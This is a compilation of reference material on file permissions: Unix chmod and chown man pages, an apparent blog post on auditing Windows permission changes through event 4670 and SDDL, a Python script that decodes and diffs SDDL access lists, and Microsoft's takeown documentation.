The letters rwxXst select file mode bits for the affected users: read (r), write (w), execute (or search for directories) (x), execute/search only if the file is a directory or already has execute permission for some user (X), set user or group ID on execution (s), restricted deletion flag or sticky bit (t). Instead of one or more of these letters, you can specify exactly one of the letters ugo: the permissions granted to the user who owns the file (u), the permissions granted to other users who are members of the file's group (g), and the permissions granted to users that are in neither of the two preceding categories (o).
A numeric mode is from one to four octal digits (0-7), derived by adding up the bits with values 4, 2, and 1. Omitted digits are assumed to be leading zeros. The first digit selects the set user ID (4) and set group ID (2) and restricted deletion or sticky (1) attributes. The second digit selects permissions for the user who owns the file: read (4), write (2), and execute (1); the third selects permissions for other users in the file's group, with the same values; and the fourth for other users not in the file's group, with the same values.

chmod never changes the permissions of symbolic links; the chmod system call cannot change their permissions. This is not a problem since the permissions of symbolic links are never used. However, for each symbolic link listed on the command line, chmod changes the permissions of the pointed-to file. In contrast, chmod ignores symbolic links encountered during recursive directory traversals.

Setuid and Setgid Bits
chmod clears the set-group-ID bit of a regular file if the file's group ID does not match the user's effective group ID or one of the user's supplementary group IDs, unless the user has appropriate privileges. Additional restrictions may cause the set-user-ID and set-group-ID bits of MODE or RFILE to be ignored. This behavior depends on the policy and functionality of the underlying chmod system call. When in doubt, check the underlying system behavior.

chmod preserves a directory's set-user-ID and set-group-ID bits unless you explicitly specify otherwise. You can set or clear the bits with symbolic modes like u+s and g-s, and you can set (but not clear) the bits with a numeric mode.

Restricted Deletion Flag or Sticky Bit
The restricted deletion flag or sticky bit is a single bit, whose interpretation depends on the file type.
For directories, it prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory; this is called the restricted deletion flag for the directory, and is commonly found on world-writable directories like /tmp. For regular files on some older systems, the bit saves the program's text image on the swap device so it will load more quickly when run; this is called the sticky bit.

Options
Change the mode of each FILE to MODE.
  -c, --changes
      like verbose but report only when a change is made
  --no-preserve-root
      do not treat '/' specially (the default)
  --preserve-root
      fail to operate recursively on '/'
  -f, --silent, --quiet
      suppress most error messages
  -v, --verbose
      output a diagnostic for every file processed
  --reference=RFILE
      use RFILE's mode instead of MODE values
  -R, --recursive
      change files and directories recursively
  --help
      display this help and exit
  --version
      output version information and exit
Each MODE is of the form '[ugoa]*([-+=]([rwxXst]*|[ugo]))+'.

Author
Written by David MacKenzie and Jim Meyering.

Reporting Bugs
Report chmod bugs to bug-coreutils@gnu.org
GNU coreutils home page:
General help using GNU software:
Report chmod translation bugs to

Copyright
Copyright © 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.

See Also
chmod(2)
The full documentation for chmod is maintained as a Texinfo manual. If the info and chmod programs are properly installed at your site, the command info coreutils 'chmod invocation' should give you access to the complete manual.
Referenced By
acl(5), apmsleep(1), attr(5), chacl(1), cloginrc(5), collectd.conf(5), cpmchmod(1), faxcron(8), fcntl(2), find(1), finger(1), fsdiff(1), genisoimage(1), gfs2_mount(8), gfs_mount(8), guestfish(1), jk_init(8), kpsestat(1), ksh(1), ksh93(1), lp(4), lslk(8), mailx(1), mkfs.xfs(8), mksh(1), mount.gfs2(8), mtree(8), nfs4_acl(5), nfs4_setfacl(1), path_resolution(2), path_resolution(7), rfchmod(1), rfmkdir(1), rrdcached(1), rsync(1), rsyncd.conf(5), sane-umax_pp(5), setfacl(1), setmode(3), sh(1), shellinaboxd(1), slapd(8), snmpd.conf(5), sssd-krb5(5), star(1), strmode(3), symlink(7), tex4ht(1), texmfstart(1), zapping_setup_fb(1), zoo(1), zshbuiltins(1)
chown(1) - Linux man page (die.net)

Name
  chown - change file owner and group

Synopsis
  chown [OPTION]... [OWNER][:[GROUP]] FILE...
  chown [OPTION]... --reference=RFILE FILE...

Description
This manual page documents the GNU version of chown. chown changes the user and/or group ownership of each given file. If only an owner (a user name or numeric user ID) is given, that user is made the owner of each given file, and the files' group is not changed. If the owner is followed by a colon and a group name (or numeric group ID), with no spaces between them, the group ownership of the files is changed as well. If a colon but no group name follows the user name, that user is made the owner of the files and the group of the files is changed to that user's login group. If the colon and group are given, but the owner is omitted, only the group of the files is changed; in this case, chown performs the same function as chgrp. If only a colon is given, or if the entire operand is empty, neither the owner nor the group is changed.

Options
Change the owner and/or group of each FILE to OWNER and/or GROUP. With --reference, change the owner and group of each FILE to those of RFILE.
  -c, --changes
      like verbose but report only when a change is made
  --dereference
      affect the referent of each symbolic link (this is the default), rather than the symbolic link itself
  -h, --no-dereference
      affect each symbolic link instead of any referenced file (useful only on systems that can change the ownership of a symlink)
  --from=CURRENT_OWNER:CURRENT_GROUP
      change the owner and/or group of each file only if its current owner and/or group match those specified here. Either may be omitted, in which case a match is not required for the omitted attribute.
  --no-preserve-root
      do not treat '/' specially (the default)
  --preserve-root
      fail to operate recursively on '/'
  -f, --silent, --quiet
      suppress most error messages
  --reference=RFILE
      use RFILE's owner and group rather than specifying OWNER:GROUP values
  -R, --recursive
      operate on files and directories recursively
  -v, --verbose
      output a diagnostic for every file processed

The following options modify how a hierarchy is traversed when the -R option is also specified. If more than one is specified, only the final one takes effect.
  -H  if a command line argument is a symbolic link to a directory, traverse it
  -L  traverse every symbolic link to a directory encountered
  -P  do not traverse any symbolic links (default)
  --help
      display this help and exit
  --version
      output version information and exit

Owner is unchanged if missing. Group is unchanged if missing, but changed to login group if implied by a ':' following a symbolic OWNER. OWNER and GROUP may be numeric as well as symbolic.

Examples
  chown root /u           Change the owner of /u to "root".
  chown root:staff /u     Likewise, but also change its group to "staff".
  chown -hR root /u       Change the owner of /u and subfiles to "root".

Author
Written by David MacKenzie and Jim Meyering.

Reporting Bugs
Report chown bugs to bug-coreutils@gnu.org
GNU coreutils home page:
General help using GNU software:
Report chown translation bugs to

Copyright
Copyright © 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.

See Also
chown(2)
The full documentation for chown is maintained as a Texinfo manual. If the info and chown programs are properly installed at your site, the command info coreutils 'chown invocation' should give you access to the complete manual.
Referenced By
fd(4), hd(4), initrd(4), lp(4), mem(4), mtree(8), procmail(1), ram(4), rpc.statd(8), sm-notify(8), symlink(7), tty(4), ttys(4), zero(4)
Monitoring File Permission Changes with the Windows Security Log (Netsurion / EventTracker)
February 19, 2014 | Security

Unstructured data access governance is a big compliance concern. Unstructured data is difficult to secure because there's so much of it, it's growing so fast, and it is user created, so it doesn't automatically get categorized and controlled like structured data in databases. Moreover, unstructured data is usually a treasure trove of sensitive and confidential information in a format that bad guys can consume and understand without reverse engineering the relationships between tables in a relational database. Most of this unstructured data is still found on file shares throughout the network, and file system permissions are the main control over this information. Therefore, knowing when permissions on unstructured data change is critical to governance and control.

File permissions should normally be fairly static, but end-users are (by default) the owners of the files and subfolders they create and can therefore change permissions on those files. And of course, administrators can change permissions on any object. Either way you need to know when this happens. Here's how to do it with the Windows Security Log.
First we need to enable the File System audit subcategory. You'll find this in any group policy object under Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\Object Access. Enable File System for success. (By the way, make sure you also enable Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\Audit: Force audit policy subcategory settings to override audit policy category settings, to make sure your audit policy takes effect.)

Now you need to enable object level auditing on the root folders containing your unstructured data. For example, if you have a shared folder called c:\files, go to that folder in Windows Explorer, open the Security tab of the folder's properties, click Advanced and select the Auditing tab. Now add an entry for Everyone that audits successful use of the Change permissions right, as shown below.

At this point Windows will begin generating two events each time you change permissions on this folder or any of its subfolders or files. One event is the standard event ID 4663, "An attempt was made to access an object", which is logged for any kind of audited file access like read, write, delete, etc. That event will show WRITE_DAC under the Access Request Information, but it doesn't tell you what the actual permission change was. So instead, use event ID 4670, "Permissions on an object were changed", which provides the before and after permissions of the object under Permissions Change, as shown in the example below.
"What does D:AI(A;ID;FA;;;AU)(A;ID;FA;;;WD)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU) mean?"

This is the original access control list of asdf.txt, but in the very cryptic Security Descriptor Definition Language (SDDL). SDDL definitely isn't something you want to manually parse and translate on a regular basis, but you can when necessary. Look for the "D:", which is close to the beginning of the string, or even at the very beginning in this case. "D:" means Discretionary Access Control List (DACL), which holds the actual permissions on the object, as opposed to the other things that show up in a security descriptor, like the owner, the primary group and the audit policy (aka SACL). Until you hit another letter-colon combination like "S:" you are looking at the object's permissions. An ACL is made up of Access Control Entries, which correspond to each item in the list you see in the Permissions tab of an object's properties dialog. But in SDDL, before listing the ACEs comprising the ACL, you will see any flags that affect the ACL as a whole. In the example above you see AI as the first element after D:. AI stands for SDDL_AUTO_INHERITED, which means permissions on parent objects are allowed to propagate down to this object.
Now come the ACEs. In SDDL, each ACE is surrounded by parentheses and the fields within it are delimited by semicolons. The first ACE in the event above is (A;ID;FA;;;AU). The first field tells you what type of ACE it is: either A for allow or D for deny. The next field lists any ACE flags that specify whether this ACE is an inherited ACE propagated down from a parent object, and if and how this ACE should propagate down to child objects. The only flag in this ACE is ID, which means the ACE is in fact inherited. The next field lists the permissions this ACE allows or denies. In this example FA stands for all file access rights. The next two fields, Object Type and Inherited Object Type, are always blank on file system permissions (hence the three semicolons in a row); they are only used in places like Active Directory where there are different types of objects (user, group, computer, etc.) that you can define permissions for. Finally, the last field is Trustee and identifies the user, group or special principal being allowed or denied access. Here you will see either the SID of the user or group or, if the ACE applies to a so-called "well-known" SID, the corresponding acronym. In this example AU stands for Authenticated Users.

Event ID 4670 does a great job of alerting you when permissions change on an object and telling you which object was affected and who did it. To go further and understand what permissions were actually changed you have to dive into SDDL. I recommend Ned Pyle's 2-part TechNet blog, The Security Descriptor Definition Language of Love, for more information on SDDL.
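An added example, not from the article: a small Python decoder for the D: section of an SDDL string such as the one in the event above, plus a diff of the "before" descriptor against an "after" descriptor, so the ACE that actually changed in a 4670 event can be reported rather than read by eye. The ACE-type, rights and trustee tables are the standard SDDL abbreviations; the "after" string is constructed for illustration.

```python
"""Decode the DACL portion of an SDDL string (as logged in event 4670) and diff
'before' and 'after' descriptors to report which ACEs actually changed."""
import re
from typing import NamedTuple

# Two-letter SDDL rights tokens seen on file system ACEs -> access-mask bits (winnt.h).
# Note: in the rights field "WD" means WRITE_DAC; in the trustee field it means Everyone.
RIGHTS_TOKENS = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
}
# Individual access-mask bits, used to spell out what a mask grants.
MASK_BITS = [
    (0x00000001, "FILE_READ_DATA"), (0x00000002, "FILE_WRITE_DATA"),
    (0x00000004, "FILE_APPEND_DATA"), (0x00000008, "FILE_READ_EA"),
    (0x00000010, "FILE_WRITE_EA"), (0x00000020, "FILE_EXECUTE"),
    (0x00000040, "FILE_DELETE_CHILD"), (0x00000080, "FILE_READ_ATTRIBUTES"),
    (0x00000100, "FILE_WRITE_ATTRIBUTES"), (0x00010000, "DELETE"),
    (0x00020000, "READ_CONTROL"), (0x00040000, "WRITE_DAC"),
    (0x00080000, "WRITE_OWNER"), (0x00100000, "SYNCHRONIZE"),
    (0x10000000, "GENERIC_ALL"), (0x20000000, "GENERIC_EXECUTE"),
    (0x40000000, "GENERIC_WRITE"), (0x80000000, "GENERIC_READ"),
]
TRUSTEES = {  # well-known trustee abbreviations used in the article's example
    "AU": "Authenticated Users", "WD": "Everyone", "BA": "BUILTIN\\Administrators",
    "BU": "BUILTIN\\Users", "SY": "NT AUTHORITY\\SYSTEM", "CO": "CREATOR OWNER",
}
ACE_TYPES = {"A": "Allow", "D": "Deny", "AU": "Audit"}


class Ace(NamedTuple):
    ace_type: str   # "Allow" / "Deny" / "Audit"
    flags: tuple    # e.g. ("ID",) for an inherited ACE, ("OI", "CI") for inheritance
    mask: int       # numeric access mask
    trustee: str    # resolved name, or the raw SID string


def rights_to_mask(field: str) -> int:
    """'FA' -> 0x1F01FF, '0x1200a9' -> 0x1200A9, 'RCWD' -> READ_CONTROL|WRITE_DAC."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS_TOKENS[field[i:i + 2]]   # KeyError on an unknown token
    return mask


def mask_names(mask: int) -> list:
    return [name for bit, name in MASK_BITS if mask & bit]


def parse_dacl(sddl: str):
    """Return (acl_flags, [Ace, ...]) for the D: section; O:/G:/S: sections are skipped."""
    m = re.search(r"D:([A-Z]*)((?:\([^()]*\))*)", sddl)
    if not m:
        raise ValueError("no DACL (D:) section found")
    acl_flags, aces = m.group(1), []
    for body in re.findall(r"\(([^()]*)\)", m.group(2)):
        parts = body.split(";")
        if len(parts) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, ace_flags, rights, _obj, _inh_obj, trustee = parts
        aces.append(Ace(
            ACE_TYPES.get(ace_type, ace_type),
            tuple(ace_flags[i:i + 2] for i in range(0, len(ace_flags), 2)),
            rights_to_mask(rights),
            TRUSTEES.get(trustee, trustee),
        ))
    return acl_flags, aces


def diff_dacls(old_sddl: str, new_sddl: str):
    """(added, removed): ACEs present only in the new or only in the old DACL."""
    old = set(parse_dacl(old_sddl)[1])
    new = set(parse_dacl(new_sddl)[1])
    return sorted(new - old), sorted(old - new)


def broad_write_dac_grants(aces) -> list:
    """Allow ACEs handing WRITE_DAC, WRITE_OWNER or GENERIC_ALL to Everyone,
    Authenticated Users or BUILTIN\\Users: the additions a reviewer wants to see first."""
    risky_bits = 0x00040000 | 0x00080000 | 0x10000000
    broad = {"Everyone", "Authenticated Users", "BUILTIN\\Users"}
    return [a for a in aces
            if a.ace_type == "Allow" and a.mask & risky_bits and a.trustee in broad]


# 'Before' DACL from the article's event 4670 example; the 'after' DACL is constructed:
# same ACEs plus an explicit (non-inherited) ACE giving BUILTIN\Users WRITE_DAC|WRITE_OWNER.
BEFORE = "D:AI(A;ID;FA;;;AU)(A;ID;FA;;;WD)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
AFTER = BEFORE + "(A;;WDWO;;;BU)"

if __name__ == "__main__":
    flags, aces = parse_dacl(BEFORE)
    print("ACL flags:", flags)
    for ace in aces:
        print(f"  {ace.ace_type:5} {','.join(ace.flags) or '-':4} "
              f"{ace.trustee:24} {mask_names(ace.mask)}")
    added, removed = diff_dacls(BEFORE, AFTER)
    print("added:", added, "\nremoved:", removed)
    print("needs review:", broad_write_dac_grants(added))
```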
takeown (Microsoft Docs)
10/16/2017, 2 minutes to read

Enables an administrator to recover access to a file that previously was denied, by making the administrator the owner of the file. For examples of how to use this command, see Examples.

Syntax
  takeown [/s [/u [\] [/p []]]] /f [/a] [/r [/d {Y|N}]]

Parameters
  /s          Specifies the name or IP address of a remote computer (do not use backslashes). The default value is the local computer. This parameter applies to all of the files and folders specified in the command.
  /u []       Runs the script with the permissions of the specified user account. The default value is system permissions.
  /p []       Specifies the password of the user account that is specified in the /u parameter.
  /f          Specifies the file name or directory name pattern. You can use the wildcard character * when specifying the pattern. You can also use the syntax ShareName*FileName*.
  /a          Gives ownership to the Administrators group instead of the current user.
  /r          Performs a recursive operation on all files in the specified directory and subdirectories.
  /d {Y | N}  Suppresses the confirmation prompt that is displayed when the current user does not have the "List Folder" permission on a specified directory, and instead uses the specified default value. Valid values for the /d option are as follows:
              - Y: Take ownership of the directory.
              - N: Skip the directory.
              Note that you must use this option in conjunction with the /r option.
  /?          Displays help at the command prompt.

Remarks
This command is typically used in batch files. If the /a parameter is not specified, file ownership is given to the user who is currently logged on to the computer. Mixed patterns using (? and *) are not supported by the takeown command.
After deleting the lock with takeown, you might have to use Windows Explorer or the cacls command to give yourself full permissions to the files and directories before you can delete them. For more information about cacls, see "Additional references" at the end of this topic.

Examples
To take ownership of a file named Lostfile, type:
  takeown /f lostfile

Additional references
Command-Line Syntax Key
Set-Acl
Module: Microsoft.PowerShell.Security
Changes the security descriptor of a specified item, such as a file or a registry key.

Syntax
  Set-Acl [-Path] [-AclObject]